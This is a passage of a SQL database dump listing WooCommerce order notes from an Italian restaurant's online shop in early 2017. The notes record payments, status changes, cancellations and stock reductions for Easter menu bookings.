lavorazione.',0,'1','WooCommerce','order_note',0,0),(100,304,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-02-10 14:35:24','2017-02-10 13:35:24','Magazzino dell\'elemento 288 ridotto da 14 a 13.',0,'1','WooCommerce','order_note',0,0),(102,305,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-02-10 21:57:56','2017-02-10 20:57:56','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(103,305,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-02-10 21:57:56','2017-02-10 20:57:56','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(104,305,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-02-10 21:57:58','2017-02-10 20:57:58','Magazzino dell\'elemento 288 ridotto da 7 a 6.',0,'1','WooCommerce','order_note',0,0),(105,306,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-02-11 13:06:09','2017-02-11 12:06:09','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(106,306,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-02-11 13:06:09','2017-02-11 12:06:09','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(107,306,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-02-11 13:06:11','2017-02-11 12:06:11','Magazzino dell\'elemento 288 ridotto da 6 a 5.',0,'1','WooCommerce','order_note',0,0),(108,307,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-02-11 20:10:18','2017-02-11 19:10:18','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(109,307,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-02-11 20:10:18','2017-02-11 19:10:18','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(110,307,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-02-11 20:10:20','2017-02-11 19:10:20','Magazzino dell\'elemento 288 ridotto da 5 a 4.',0,'1','WooCommerce','order_note',0,0),(111,308,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-02-12 11:22:49','2017-02-12 10:22:49','Ordine cancellato dal cliente. Lo stato dell\'ordine è cambiato da In attesa di pagamento a Cancellato.',0,'1','WooCommerce','order_note',0,0),(112,309,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-02-12 12:08:21','2017-02-12 11:08:21','Ordine non pagato annullato - tempo limite raggiunto. Lo stato dell\'ordine è cambiato da In attesa di pagamento a Cancellato.',0,'1','WooCommerce','order_note',0,0),(113,310,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-02-12 15:21:05','2017-02-12 14:21:05','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(114,310,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-02-12 15:21:05','2017-02-12 14:21:05','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(115,310,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-02-12 15:21:06','2017-02-12 14:21:06','Magazzino dell\'elemento 288 ridotto da 4 a 3.',0,'1','WooCommerce','order_note',0,0),(117,311,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-02-12 22:59:07','2017-02-12 21:59:07','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(118,311,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-02-12 22:59:07','2017-02-12 21:59:07','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(119,311,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-02-12 22:59:09','2017-02-12 21:59:09','Magazzino dell\'elemento 288 ridotto da 3 a 2.',0,'1','WooCommerce','order_note',0,0),(120,313,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-02-13 12:03:12','2017-02-13 11:03:12','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(121,313,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-02-13 12:03:12','2017-02-13 11:03:12','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(122,313,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-02-13 12:03:14','2017-02-13 11:03:14','Magazzino dell\'elemento 290 ridotto da 3 a 2.',0,'1','WooCommerce','order_note',0,0),(123,312,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-02-13 12:07:18','2017-02-13 11:07:18','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(124,312,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-02-13 12:07:18','2017-02-13 11:07:18','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(125,312,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-02-13 12:07:20','2017-02-13 11:07:20','Magazzino dell\'elemento 290 ridotto da 2 a 1.',0,'1','WooCommerce','order_note',0,0),(126,314,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-02-13 13:13:29','2017-02-13 12:13:29','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(127,314,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-02-13 13:13:29','2017-02-13 12:13:29','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(128,314,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-02-13 13:13:30','2017-02-13 12:13:30','Magazzino dell\'elemento 288 ridotto da 2 a 1.',0,'1','WooCommerce','order_note',0,0),(129,312,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-02-13 15:42:52','2017-02-13 14:42:52','Pagamento refunded tramite IPN. Lo stato dell\'ordine è cambiato da In lavorazione a Rimborsato.',0,'1','WooCommerce','order_note',0,0),(130,316,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-02-13 19:53:58','2017-02-13 18:53:58','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(131,316,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-02-13 19:53:58','2017-02-13 18:53:58','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(132,316,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-02-13 19:54:00','2017-02-13 18:54:00','Magazzino dell\'elemento 288 ridotto da 1 a 0.',0,'1','WooCommerce','order_note',0,0),(133,318,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-02-14 10:42:57','2017-02-14 09:42:57','Ordine non pagato annullato - tempo limite raggiunto. Lo stato dell\'ordine è cambiato da In attesa di pagamento a Cancellato.',0,'1','WooCommerce','order_note',0,0),(134,319,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-02-14 13:16:58','2017-02-14 12:16:58','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(135,319,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-02-14 13:16:58','2017-02-14 12:16:58','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(136,319,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-02-14 13:17:00','2017-02-14 12:17:00','Magazzino dell\'elemento 288 ridotto da 1 a 0.',0,'1','WooCommerce','order_note',0,0),(158,342,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-03-23 18:29:44','2017-03-23 17:29:44','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(159,342,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-03-23 18:29:44','2017-03-23 17:29:44','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(160,342,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-03-23 18:29:46','2017-03-23 17:29:46','Magazzino dell\'elemento pasquetta2017-2pax ridotto da 8 a 7.',0,'1','WooCommerce','order_note',0,0),(161,343,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-03-23 19:36:04','2017-03-23 18:36:04','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(162,343,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-03-23 19:36:04','2017-03-23 18:36:04','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(163,343,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-03-23 19:36:06','2017-03-23 18:36:06','Magazzino dell\'elemento pasquetta2017-2pax ridotto da 7 a 6.',0,'1','WooCommerce','order_note',0,0),(164,344,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-03-24 10:43:33','2017-03-24 09:43:33','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(165,344,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-03-24 10:43:33','2017-03-24 09:43:33','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(166,344,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-03-24 10:43:35','2017-03-24 09:43:35','Magazzino dell\'elemento pasqua2017-3pax ridotto da 2 a 1.',0,'1','WooCommerce','order_note',0,0),(167,345,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-03-25 20:11:50','2017-03-25 19:11:50','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(168,345,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-03-25 20:11:50','2017-03-25 19:11:50','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(169,345,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-03-25 20:11:52','2017-03-25 19:11:52','Magazzino dell\'elemento pasqua2017-2pax ridotto da 8 a 7.',0,'1','WooCommerce','order_note',0,0),(170,346,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-03-25 21:07:55','2017-03-25 20:07:55','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(171,346,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-03-25 21:07:55','2017-03-25 20:07:55','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(172,346,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-03-25 21:07:56','2017-03-25 20:07:56','Magazzino dell\'elemento pasqua2017-4pax ridotto da 5 a 4.',0,'1','WooCommerce','order_note',0,0),(260,347,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-03-28 10:30:39','2017-03-28 08:30:39','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(261,347,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-03-28 10:30:39','2017-03-28 08:30:39','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(262,347,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-03-28 10:30:40','2017-03-28 08:30:40','Magazzino dell\'elemento pasquetta2017-2pax ridotto da 6 a 5.',0,'1','WooCommerce','order_note',0,0),(263,348,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-03-28 13:24:25','2017-03-28 11:24:25','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(264,348,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-03-28 13:24:25','2017-03-28 11:24:25','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(265,348,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-03-28 13:24:26','2017-03-28 11:24:26','Magazzino dell\'elemento pasqua2017-4pax ridotto da 4 a 3.',0,'1','WooCommerce','order_note',0,0),(266,349,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-03-29 22:35:40','2017-03-29 20:35:40','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(267,349,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-03-29 22:35:40','2017-03-29 20:35:40','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(268,349,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-03-29 22:35:41','2017-03-29 20:35:41','Magazzino dell\'elemento pasqua2017-3pax ridotto da 1 a 0.',0,'1','WooCommerce','order_note',0,0),(269,350,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-03-30 15:22:38','2017-03-30 13:22:38','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(270,350,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-03-30 15:22:38','2017-03-30 13:22:38','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(271,350,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-03-30 15:22:39','2017-03-30 13:22:39','Magazzino dell\'elemento pasqua2017-2pax ridotto da 7 a 6.',0,'1','WooCommerce','order_note',0,0),(272,351,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-01 14:43:28','2017-04-01 12:43:28','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(273,351,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-01 14:43:28','2017-04-01 12:43:28','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(274,351,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-01 14:43:29','2017-04-01 12:43:29','Magazzino dell\'elemento pasquetta2017-2pax ridotto da 5 a 4.',0,'1','WooCommerce','order_note',0,0),(275,352,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-01 18:03:47','2017-04-01 16:03:47','Ordine non pagato annullato - tempo limite raggiunto. Lo stato dell\'ordine è cambiato da In attesa di pagamento a Cancellato.',0,'1','WooCommerce','order_note',0,0),(276,353,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-01 18:24:04','2017-04-01 16:24:04','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(277,353,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-01 18:24:04','2017-04-01 16:24:04','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(278,353,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-01 18:24:05','2017-04-01 16:24:05','Magazzino dell\'elemento pasqua2017-4pax ridotto da 3 a 2.',0,'1','WooCommerce','order_note',0,0),(279,354,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-02 10:31:23','2017-04-02 08:31:23','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(280,354,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-02 10:31:23','2017-04-02 08:31:23','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(281,354,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-02 10:31:24','2017-04-02 08:31:24','Magazzino dell\'elemento pasquetta2017-3pax ridotto da 2 a 1.',0,'1','WooCommerce','order_note',0,0),(282,355,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-02 17:34:46','2017-04-02 15:34:46','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(283,355,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-02 17:34:46','2017-04-02 15:34:46','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(284,355,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-02 17:34:47','2017-04-02 15:34:47','Magazzino dell\'elemento pasqua2017-2pax ridotto da 6 a 5.',0,'1','WooCommerce','order_note',0,0),(285,357,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-04 09:37:12','2017-04-04 07:37:12','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(286,357,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-04 09:37:12','2017-04-04 07:37:12','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(287,357,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-04 09:37:14','2017-04-04 07:37:14','Magazzino dell\'elemento pasquetta2017-2pax ridotto da 4 a 3.',0,'1','WooCommerce','order_note',0,0),(288,358,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-04 20:24:38','2017-04-04 18:24:38','Ordine cancellato dal cliente. Lo stato dell\'ordine è cambiato da In attesa di pagamento a Cancellato.',0,'1','WooCommerce','order_note',0,0),(289,359,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-04 20:29:21','2017-04-04 18:29:21','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(290,359,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-04 20:29:21','2017-04-04 18:29:21','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(291,359,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-04 20:29:23','2017-04-04 18:29:23','Magazzino dell\'elemento pasquetta2017-2pax ridotto da 3 a 2.',0,'1','WooCommerce','order_note',0,0),(292,360,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-05 12:58:51','2017-04-05 10:58:51','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(293,360,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-05 12:58:51','2017-04-05 10:58:51','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(294,360,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-05 12:58:52','2017-04-05 10:58:52','Magazzino dell\'elemento pasqua2017-4pax ridotto da 2 a 1.',0,'1','WooCommerce','order_note',0,0),(295,361,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-06 09:38:13','2017-04-06 07:38:13','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(296,361,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-06 09:38:14','2017-04-06 07:38:14','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(297,361,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-06 09:38:16','2017-04-06 07:38:16','Magazzino dell\'elemento pasquetta2017-6pax ridotto da 2 a 1.',0,'1','WooCommerce','order_note',0,0),(298,362,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-06 15:32:57','2017-04-06 13:32:57','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(299,362,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-06 15:32:57','2017-04-06 13:32:57','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(300,362,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-06 15:32:58','2017-04-06 13:32:58','Magazzino dell\'elemento pasquetta2017-2pax ridotto da 2 a 1.',0,'1','WooCommerce','order_note',0,0),(301,363,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-07 22:30:15','2017-04-07 20:30:15','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(302,363,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-07 22:30:15','2017-04-07 20:30:15','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(303,363,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-07 22:30:17','2017-04-07 20:30:17','Magazzino dell\'elemento pasqua2017-2pax ridotto da 5 a 4.',0,'1','WooCommerce','order_note',0,0),(304,364,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-09 11:53:34','2017-04-09 09:53:34','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(305,364,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-09 11:53:34','2017-04-09 09:53:34','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(306,364,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-09 11:53:36','2017-04-09 09:53:36','Magazzino dell\'elemento pasqua2017-3pax ridotto da 1 a 0.',0,'1','WooCommerce','order_note',0,0),(307,365,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-09 12:17:04','2017-04-09 10:17:04','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(308,365,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-09 12:17:04','2017-04-09 10:17:04','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(309,365,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-09 12:17:06','2017-04-09 10:17:06','Magazzino dell\'elemento pasquetta2017-2pax ridotto da 1 a 0.',0,'1','WooCommerce','order_note',0,0),(310,366,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-11 12:22:31','2017-04-11 10:22:31','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(311,366,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-11 12:22:31','2017-04-11 10:22:31','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(312,366,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-11 12:22:33','2017-04-11 10:22:33','Magazzino dell\'elemento pasquetta2017-3pax ridotto da 1 a 0.',0,'1','WooCommerce','order_note',0,0),(313,368,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-11 14:57:25','2017-04-11 12:57:25','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(314,368,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-11 14:57:25','2017-04-11 12:57:25','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(315,368,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-11 14:57:27','2017-04-11 12:57:27','Magazzino dell\'elemento pasquetta2017-4pax ridotto da 5 a 4.',0,'1','WooCommerce','order_note',0,0),(316,367,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-11 15:13:14','2017-04-11 13:13:14','Ordine non pagato annullato - tempo limite raggiunto. Lo stato dell\'ordine è cambiato da In attesa di pagamento a Cancellato.',0,'1','WooCommerce','order_note',0,0),(317,369,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-11 15:51:23','2017-04-11 13:51:23','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(318,369,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-11 15:51:23','2017-04-11 13:51:23','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(319,369,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-11 15:51:24','2017-04-11 13:51:24','Magazzino dell\'elemento pasquetta2017-6pax ridotto da 1 a 0.',0,'1','WooCommerce','order_note',0,0),(320,370,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-11 16:01:46','2017-04-11 14:01:46','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(321,370,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-11 16:01:46','2017-04-11 14:01:46','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(322,370,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-11 16:01:47','2017-04-11 14:01:47','Magazzino dell\'elemento pasquetta2017-9pax ridotto da 1 a 0.',0,'1','WooCommerce','order_note',0,0),(323,371,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-11 19:08:17','2017-04-11 17:08:17','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(324,371,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-11 19:08:17','2017-04-11 17:08:17','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(325,371,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-11 19:08:19','2017-04-11 17:08:19','Magazzino dell\'elemento pasquetta2017-7pax ridotto da 2 a 1.',0,'1','WooCommerce','order_note',0,0),(326,372,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-12 14:17:05','2017-04-12 12:17:05','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(327,372,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-12 14:17:05','2017-04-12 12:17:05','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(328,372,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-12 14:17:06','2017-04-12 12:17:06','Magazzino dell\'elemento pasquetta2017-4pax ridotto da 5 a 4.',0,'1','WooCommerce','order_note',0,0),(329,373,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-12 16:05:50','2017-04-12 14:05:50','Ordine non pagato annullato - tempo limite raggiunto. Lo stato dell\'ordine è cambiato da In attesa di pagamento a Cancellato.',0,'1','WooCommerce','order_note',0,0),(330,374,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-12 20:12:23','2017-04-12 18:12:23','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(331,374,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-12 20:12:23','2017-04-12 18:12:23','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(332,374,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-12 20:12:24','2017-04-12 18:12:24','Magazzino dell\'elemento pasqua2017-4pax ridotto da 1 a 0.',0,'1','WooCommerce','order_note',0,0),(333,375,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-13 10:05:43','2017-04-13 08:05:43','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(334,375,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-13 10:05:43','2017-04-13 08:05:43','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(335,375,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-13 10:05:44','2017-04-13 08:05:44','Magazzino dell\'elemento pasqua2017-2pax ridotto da 4 a 3.',0,'1','WooCommerce','order_note',0,0),(336,376,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-13 13:26:44','2017-04-13 11:26:44','Ordine non pagato annullato - tempo limite raggiunto. Lo stato dell\'ordine è cambiato da In attesa di pagamento a Cancellato.',0,'1','WooCommerce','order_note',0,0),(337,377,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-13 13:39:53','2017-04-13 11:39:53','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(338,377,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-13 13:39:53','2017-04-13 11:39:53','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(339,377,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-13 13:39:56','2017-04-13 11:39:56','Magazzino dell\'elemento pasquetta2017-4pax ridotto da 4 a 3.',0,'1','WooCommerce','order_note',0,0),(340,378,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-13 14:09:04','2017-04-13 12:09:04','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(341,378,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-13 14:09:05','2017-04-13 12:09:05','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(342,378,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-13 14:09:06','2017-04-13 12:09:06','Magazzino dell\'elemento pasquetta2017-2pax ridotto da 1 a 0.',0,'1','WooCommerce','order_note',0,0),(343,379,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-13 14:11:43','2017-04-13 12:11:43','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(344,379,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-13 14:11:43','2017-04-13 12:11:43','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(345,379,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-13 14:11:44','2017-04-13 12:11:44','Magazzino dell\'elemento pasqua2017-4pax ridotto da 1 a 0.',0,'1','WooCommerce','order_note',0,0),(346,380,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-13 14:17:31','2017-04-13 12:17:31','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(347,380,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-13 14:17:31','2017-04-13 12:17:31','Lo stato dell\'ordine è cambiato da In attesa di pagamento 